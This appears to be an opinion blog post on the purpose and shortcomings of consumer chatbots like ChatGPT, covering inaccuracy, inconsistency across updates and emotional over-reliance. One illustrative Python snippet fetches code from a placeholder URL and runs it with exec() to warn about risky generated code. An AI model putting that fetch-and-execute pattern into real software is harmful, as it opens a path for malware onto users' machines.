Is This What ChatGPT Was Made For?

What is the purpose of a consumer-facing LLM like ChatGPT, or C.AI, or any number of other services?

Imperfect Mess

Alright, so LLMs have developed a reputation for being wrong. When an unspecialized LLM is told to code, it can make mistakes that introduce malware (e.g. it writes some code, adds a line that says “call this file from the web!”, and the file’s a malicious one, to put it briefly). When an unspecialized LLM tries to do things like ID mushrooms, its failure rate isn’t 100%, but it’s still high enough that relying on it would be a bad, potentially fatal idea. When an unspecialized LLM is asked for health advice, it recommends things based on all the data it has ever gathered, which includes the CDC as well as conspiracy sites – and given the nature of conspiracies, the claims on those sites have been repeated over and over, which gives them weight in the training data. Are seed oils toxic? Well, you can ask the group of scientists who’ve been studying the question for years, or you can ask this group of people who MIGHT have some scientists… who have never submitted a paper… none of whom are actually medical doctors… ChatGPT literally cannot tell these two groups apart.
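To make that coding failure concrete, here’s a minimal sketch of the pattern in question – everything below is illustrative, and the URL is a placeholder, not a real incident. The danger isn’t any one line so much as the shape of the thing: plausible-looking generated code that fetches a file from the web and runs it, no questions asked.

```python
# Illustrative only: the kind of risky code an unspecialized LLM can emit.
# The URL is a placeholder; the problem is the pattern itself --
# downloading arbitrary code and executing it without any verification.
import urllib.request

def install_helper():
    # "call this file from the web!" -- whatever the server returns gets run.
    # If the host is malicious (or compromised later), this is a malware
    # delivery path hiding inside otherwise reasonable-looking code.
    code = urllib.request.urlopen("https://example.com/helper.py").read()
    exec(code)  # executes unverified remote code with your privileges
```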

That’s the root of the issue: ChatGPT cannot differentiate between sources, because it can’t learn the way a person can. ChatGPT can be told the hallmarks of quality sources, but any group invested in their cause will fake those hallmarks, and ChatGPT will pick up bad info again.

This also creates issues with consistency. People who have workflows designed around consistent answers, or at least a consistent quality of answers (like you’d want for a chatbot on a website, for instance), have discovered that each update meant to improve overall stability ends up breaking their specific bot’s stability within its given task.
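For what it’s worth, there’s a partial workaround – a sketch, assuming a provider that offers dated model snapshots, like OpenAI’s API does. You pin your bot to a specific snapshot instead of a floating alias, so a platform update doesn’t silently change its behavior out from under you. The model name and prompt here are illustrative:

```python
# A sketch of pinning a model snapshot so provider updates don't
# silently change a deployed bot's behavior. Assumes the OpenAI
# Python SDK and an OPENAI_API_KEY in the environment; model names
# and the prompt are illustrative.
from openai import OpenAI

client = OpenAI()

response = client.chat.completions.create(
    model="gpt-4o-2024-08-06",  # a dated snapshot, not the floating "gpt-4o" alias
    messages=[{"role": "user", "content": "Summarize our store's return policy."}],
    temperature=0,  # reduce run-to-run variation in answers
)
print(response.choices[0].message.content)
```

Pinning only helps until the snapshot is retired, though, which is part of the complaint: the consistency you built your workflow around eventually goes away on the provider’s schedule, not yours.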

They’ve also developed a reputation for leading people on emotionally. ChatGPT is very calming and comforting to talk to. It’s not judgmental, it never gets mad when you need time away from it, and it never remarks on how long you were gone. Other models are similar, if not even more familiar: Grok’s chatbots have ‘personalities’, but pretty much all of them except the ‘argumentative’ one are too friendly to actually do the job of ‘an assistant’. It can’t seem to truly behave indifferently – or it can’t seem to pick the words that would make it seem indifferent. It is either mean and argumentative, or friendly in the way a well-known acquaintance is.

How much of this is an LLM’s fault? How much chatbot addiction could possibly be the chatbot’s fault? Consider another common salve for a lack of social connection: alcohol. Is it the alcohol’s fault some people can’t control themselves around it? Is it the bar’s fault, for advertising that you could come watch the game with them?

Or, if it’s a shady bar: how responsible can you even hold a bar for advertising that it can call your spouse and pretend to be work, to let them know you’ll be home late? ChatGPT briefly suggested it could text your friends for you, or at least ghostwrite the texts. A number of LLMs are not discouraging people from using them as free therapy, just not advertising it – because users are doing that for them. Similarly, ChatGPT updated and broke itself as a romantic companion, but it never told those people ‘you can date ChatGPT’; it just didn’t discourage them until it had to metaphorically yank the toys out of their hands, and everyone involved is a little unhappier now. With the amount of data that should be going through their servers, and with the amount of publicity the relationship communities got, how is it possible they couldn’t give more advance warning? Why not keep 4o on the table – why not just update the chatbot so that it stops telling people to kill themselves, which is doubtless one of the reasons the no-relationships change was made in the first place? Through all of this, it’s still friendly. It’s still so gratingly friendly you can’t help but want to keep talking to it, which is even more off-putting.

So: general-use LLMs are inaccurate often enough that using them to summarize things is a bit of a gamble. Using them for raw research is also questionable. Using one as a companion? Questionable, and apparently undesirable for the company. Writing texts for you? Or emails? Well – you should probably be doing that yourself, if only because a general LLM is not going to sound like you. Rephrasing, sure, maybe. IS that its job, though? Or how about writing papers for you? See research above, plus a growing number of services trying to identify cheaters using AI themselves, with mixed success. Realistically, you should be writing your own papers, but that’s not the question at hand. Also, not everyone is in college, and while businesses catering to college students exist, they aren’t multi-billion-dollar industries outside of the colleges themselves – which are also usually bringing in research grants, so the numbers are a little different anyway.

Specialized LLMs – LLMs trained to do one specific task repeatedly, or designed to sound like a particular person, or to have expertise in a particular domain – may eventually be good enough (given the resources, like lawyers to advise on training data, for example) to do the jobs currently being asked of woefully underequipped generalized LLMs.